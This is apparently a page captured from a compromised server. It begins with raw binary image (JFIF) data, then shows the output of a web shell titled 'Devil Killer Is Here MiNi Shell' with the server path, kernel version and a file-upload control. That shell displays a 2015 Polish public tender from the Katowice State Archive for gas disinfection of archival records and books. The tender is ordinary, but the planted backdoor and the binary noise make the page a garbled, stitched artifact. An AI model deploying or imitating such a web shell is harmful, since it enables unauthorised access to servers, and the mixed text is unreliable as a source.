JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150422/91834-N-2015.html

<p class="kh_header"><b>Katowice: Usługa dezynfekcji gazowej materiałów archiwalnych i zbiorów bibliotecznych</b><br>
<b>Numer ogłoszenia: 91834 - 2015; data zamieszczenia: 22.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Archiwum Państwowe w Katowicach , ul. Józefowska 104, 40-145 Katowice, woj. śląskie, tel. 0-32  208 78 01, faks 0-32 208 78 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.ap.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa skarbu państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa dezynfekcji gazowej materiałów archiwalnych i zbiorów bibliotecznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:

1.	Dezynfekcja gazowa, czyli postępowanie mające na celu zniszczenie mikroorganizmów znajdujących się w materiałach archiwalnych zwanych dalej aktami,  oraz zbiorów bibliotecznych zwanych dalej książkami, przy pomocy mieszanki do sterylizacji przemysłowej o nazwie GAZ S-9 zawierającej tlenek etylenu (EO) o wysokiej czystości w gazie osłonowym, jakim jest dwutlenek węgla (CO2), przy czym zawartość EO wynosi 9% wartości wagowej zawartość CO2 - 91% wagowej
Proces dezynfekcji powinien być prowadzony w warunkach obniżonego ciśnienia (próżni) w komorze fumigacyjnej 
2.	Dezynfekcja obejmie około, przy czym nie więcej niż 3.380 mb, w tym:
2.1	ok. 3.130 mb akt, przy czym nie więcej niż, 28.000 pudeł lub paczek, 
ok. 250 mb. książek, przy czym nie więcej niż, 13.000 voluminów. 

2.2	akta i książki wymienione w pkt. 2.1 przechowywane są w trzech obiektach w Bielsku-Białej, w Oświęcimiu i Żywcu, z czego:
- około 1125 mb akt, oraz ok. 65 mb książek znajduje się w magazynach w Oddziale w Bielsku-Białej, przy ul.Wapienickiej 34-34a,
- około 1190 akt oraz około 120 mb książek znajduje się w magazynach w Oddziale w Oświęcimiu, teren Państwowego Muzeum Auschwitz-Birkenau, 
- około 815 mb akt, oraz ok. 65 mb książek w magazynach w Oddziale w Żywcu, przy ul. Świętokrzyskiej 50a

3.	Zakres przedmiotu zamówienia obejmuje również odbiór akt i książek od Zamawiającego bezpośrednio z magazynów (z regałów) w Bielsku-Białej, w Oświęcimiu oraz Żywcu i przekazanie akt i książek po dezynfekcji Zamawiającemu do magazynu w nowej siedzibie Oddziału w Bielsku-Białej, przy ul. Piłsudskiego 43, a także sporządzenie stosownej dokumentacji potwierdzającej skuteczne przeprowadzenie dezynfekcji.
3.1	zasady odbioru akt i książek przez Wykonawcę:
a.	Wykonawca dostarczy na plac przed wskazanym budynkiem archiwalnym samochód ciężarowy umożliwiający bezpieczne przewożenie materiałów do dezynfekcji, o pojemności i ładowności oszacowanej według jego własnej oceny i jego potrzeb transportowych.
b.	Akta i książki będą przekazywane Wykonawcy bezpośrednio z magazynów. Załadunek akt i książek na samochód ciężarowy będzie prowadzony siłami Wykonawcy, poczynając od zdjęcia pudła lub paczki z regałów w danym magazynie w każdym z budynków. W związku z tym Wykonawca zapewni odpowiednią ilość pracowników do przemieszczania pudeł i paczek na trasie od regału do samochodu.
c.	Z powodu konieczności zachowania porządku i kolejności poszczególnych pudeł i paczek akt i książek przy ich przekazywaniu, Zamawiający będzie przekazywał w ciągu dnia roboczego nie więcej niż 1.400 pudeł lub paczek.
d.	Wykonawcy mogą być przekazywane wyłącznie całe zespoły archiwalne.
e.	Książki zostaną przekazane w ostatnim transporcie wykonywanym z danego Oddziału.
f.	Z magazynów Oddziałów w Bielsku Białej i Żywcu akta i książki mogą być wydawane Wykonawcy tylko w dni robocze w godzinach od 8:00 do 15:00.
g.	Z magazynów Oddziału w Oświęcimiu, akta i książki mogą być wydawane Wykonawcy tylko w dni robocze w godzinach od 5:00 do 8:00 oraz od 19:00 do 23:00. W przypadku tego Oddziału wysokość maksymalna samochodu dostawczego nie może przekroczyć 310 cm oraz całkowity ciężar do 12 ton (waga samochodu wraz z załadunkiem).
h.	Każdorazowo data i godziny transportu z magazynów Oddziałów muszą być skonsultowane z Kierownikami Oddziałów, o których mowa w pkt. 3.1 Części I SIWZ.
i.	Każdorazowo przy odbiorze akt każdego zespołu archiwalnego oraz książek zostanie sporządzony List przewozowy (protokół zdawczo-odbiorczy), stanowiący Załącznik nr 1 do Umowy, a Załącznik nr 11 do niniejszej SIWZ. Zamieszczona w nim metryczka służy do sprawdzenia ilości pudeł przekazanych akt i paczek z książkami.
j.	Każdorazowo przy odbiorcze każdego transportu akt i książek zostanie sporządzone Zestawienie listów przewozowych, o których mowa w pkt.k poniżej, stanowiący Załącznik nr 2 do Umowy, a Załącznik nr 12 do SIWZ.
k.	Listy przewozowe i zbiorcze zestawienie listów przewozowych sporządza Zamawiający, z którego jeden egzemplarz przekazuje Wykonawcy przy przekazaniu objętej nimi partii akt lub książek. Natomiast Wykonawca sporządza kopię tego listu i dostarcza go Zamawiającemu wraz z aktami przy ich przekazaniu Zamawiającemu. Zabieg ten ma na celu m.in. zapewnienie utrzymania porządku kolejności dostarczonych pudeł i paczek. 
3.2	Zasady odbioru akt i książek po procesie dezynfekcji przez Zamawiającego:
a.	Wykonawca zobowiązany jest dostarczyć daną partię akt lub książek, w ilości i porządku zgodnym z listem przewozowym, o którym mowa w pkt. 3.1.g powyżej, (protokołem przekazania) otrzymanym podczas przyjmowana do dezynfekcji;
b.	Zamawiający zdolny jest przyjąć dziennie nie więcej niż 1.400 pudeł lub paczek;
c.	Akta mogą być wydawane Zamawiającemu tylko w dni robocze w godzinach od 8,00 do 15,00;
d.	Każdorazowo data i godzina transportu winna być skonsultowana z Pełnomocnikiem Zamawiającego, który będzie wskazany w Umowie, stanowiącej Załącznik nr 5 do SIWZ;
e.	Wykonawca jest zobowiązany dostarczyć pudła lub paczki poddane fumigacji do magazynu w nowej siedzibie Oddziału w Bielsku-Białej, przy ul. Piłsudskiego 43. W związku z tym Wykonawca zapewni odpowiednią ilość pracowników do przemieszczania pudeł i paczek na trasie od samochodu do wskazanego magazynu.

Podczas przekazania Zleceniodawcy należy sporządzić list przewozowy (protokół zdawczo-odbiorczy), według Załącznika nr 1 do Umowy.

4.	Zamawiający określa następujące zasady przeprowadzenia procesu dezynfekcji akt i książek:
4.1	Dezynfekcja powinna być prowadzona w komorze fumigacyjnej według standardów przewidzianych dla materiałów archiwalnych: 
a.	po umieszczeniu akt lub książek wstępne wypompowanie powietrza, 
b.	nawilżanie i nagrzewanie do wilgotności względnej RH 60% i temperatury 45oC, nie więcej niż 55oC, 
c.	obniżenie ciśnienia w komorze do 100 mbar, 
d.	wprowadzenie gazu do komory o odpowiednim stężeniu - ciśnienie 750-800 mbar, 
e.	właściwa dezynfekcja trwająca, co najmniej 24 godziny przy stężeniu gazu, co najmniej 200 mg/m3. Proces ten może zostać przedłużony do 36 godzin w przypadku materiałów, które nie mogą zostać np. silnie nawilżone lub podgrzewane,
f.	parametry czasu trwania dezynfekcji właściwej powinny zostać ustalone przed rozpoczęciem procesu dezynfekcji w zależności od rodzaju materiału i stopnia skażenia mikrobiologicznego akt i książek,
g.	usuwanie gazu z komory,
h.	przewietrzanie - poprzez kilkakrotne powtarzanie następujących po sobie cykli (minimum 12 cykli) napełniania komory powietrzem,
i.	kwarantanna poza komorą, w pomieszczeniu suchym, przewiewnym, z czystym mikrobiologicznie powietrzem do uzyskania dopuszczalnego poziomu pozostałego w aktach lub książkach tlenku etylenu. 
4.2	Z dezynfekcji każdego co piątego (w odniesieniu do materiałów z Oddziałów w Bielsku-Białej i Żywcu) oraz każdego (w odniesieniu do materiałów z Oddziału w Oświęcimiu) wsadu do komory fumigacyjnej należy pobrać próby mikrobiologiczne z 5 j.a. (10 prób: okładka i wnętrze). 
4.2.1	Pobór prób i badania mikrobiologiczne ma wykonać niezależne od Wykonawcy dezynfekcji laboratorium.
Wykonawca ma przedstawić Zamawiającemu kopię protokołu badania mikrobiologicznego wykonanego przez laboratorium oraz protokół badania końcowego określający:
- skuteczność biobójczą dezynfekcji, według Załącznik nr 4 do Umowy, a Załącznika nr 13 do SIWZ,
- wydruk przebiegu procesu dezynfekcji obejmujący datę rozpoczęcia i zakończenia procesu oraz parametry fizyczne procesu. 
4.2.2	Protokół badania końcowego zawierający ocenę skuteczności dezynfekcji oraz kopie badań mikrobiologicznych winny zostać dostarczony (faxem lub drogą e-mail) Zamawiającemu przed przekazaniem danej partii akt lub książek do nowej siedziby oddziału Archiwum w Bielsku-Białej.
Zamawiający zastrzega sobie prawo do wykonania kontrolnego badania skuteczności biobójczej dezynfekcji. Brak pełnej skuteczności biobójczej w stosunku do bakterii nie dyskwalifikuje zabiegu dezynfekcji, jednakże Zamawiający zastrzega sobie możliwość interpretacji wyników dezynfekcji;
4.2.3	Po otrzymaniu kopii protokołu badania końcowego Zamawiający wyraża zgodę na przekazanie zdezynfekowanych akt Zamawiającemu do nowej siedziby oddziału Archiwum w Bielsku-Białej lub zarządza badanie - kontrolę sprawdzającą rezultatów dezynfekcji.
Kontrola sprawdzająca może zostać wykonana w obecności przedstawiciela Wykonawcy w miejscu przechowywaniu akt i książek po dezynfekcji u Wykonawcy lub też natychmiast po ich zwrocie w magazynie Zamawiającego.
Jeżeli Zamawiający uzna, że brak odpowiedniej skuteczności procesu dezynfekcji nastąpił bezspornie z winy Wykonawcy, Wykonawca ponosi całkowitą odpowiedzialność za dodatkowe badanie i niniejszym wyraża zgodę na obciążenie jego rachunku kosztami tego badania lub też bezpośrednie odliczenie kosztów z wynagrodzenia należnego dla Wykonawcy. Negatywne wyniki skuteczności biobójczej procesu dezynfekcji, zobowiązują Wykonawcę do powtórzenia procesu dezynfekcji. Kontrolę skuteczności powtórnego zabiegu należy powtórzyć w odniesieniu do całej partii materiału objętej listem przewozowym, w składzie której znalazły się materiały nie objęte kontrolą , która dała wynik niezadowalający..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zgodnie z art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych
Przedmiotem zamówienia uzupełniającego będzie dezynfekcja kolejnej części materiałów archiwalnych po cenach jednostkowych wyliczonych według ceny dezynfekcji jednego metra bieżącego ustalonej w wyniku niniejszego postępowania o udzielenie zamówienia publicznego.
Udzielenie zamówienia uzupełniającego nie jest obligatoryjne dla stron postępowania.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.92.40.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający, zgodnie z dyspozycją art. 36 ust. 3 w zw. z art. 45 ust. 2 ustawy Prawo zamówień publicznych, nie żąda wniesienia przez Wykonawców wadium w niniejszym postępowaniu o udzielenie zamówienia publicznego</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia o spełnianiu przez Wykonawcę warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych, zgodnie z wzorem stanowiącym Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert - a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował (a w przypadku świadczeń okresowych lub ciągłych również realizował) co najmniej 2 (dwie) usługi, polegające na dezynfekcji zbiorów archiwalnych o podobnym charakterze, dotyczących co najmniej 50-letnich dokumentów, należących do instytucji kultury lub instytucji naukowej, zajmującej się przechowywaniem takich zbiorów (biblioteki, muzea, archiwa), o wartości brutto co najmniej 100.000,00 zł (stu tysięcy złotych) każda z usług, z podaniem wartości brutto (każdej z usług z osobna), przedmiotu, dat ich wykonania, oraz podmiotów, na rzecz których usługi zostały wykonane, wraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować:
1	komorą bądź komorami próżniowymi zapewniającymi dezynfekcję z użyciem mieszanki do sterylizacji przemysłowej gazu typu S-9 oraz oddzielnymi magazynami na akta przed dezynfekcją oraz magazyny kwarantanny po wykonanym zabiegu dezynfekcji;
2	samochodem lub samochodami dostawczymi do przewozu zasobu zapewniające bezpieczeństwo i odporność na warunki atmosferyczne oraz innymi urządzeniami i materiałami potrzebnymi do bezpiecznego załadunku i rozładunku zasobu przewidzianego do dezynfekcji</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować:
minimum 2 (dwoma) osobami, które będą brały udział w realizacji przedmiotu zamówienia, pracującymi bezpośrednio przy procesie dezynfekcji, posiadającymi stosowne uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 1.000.000 zł (jeden milion złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
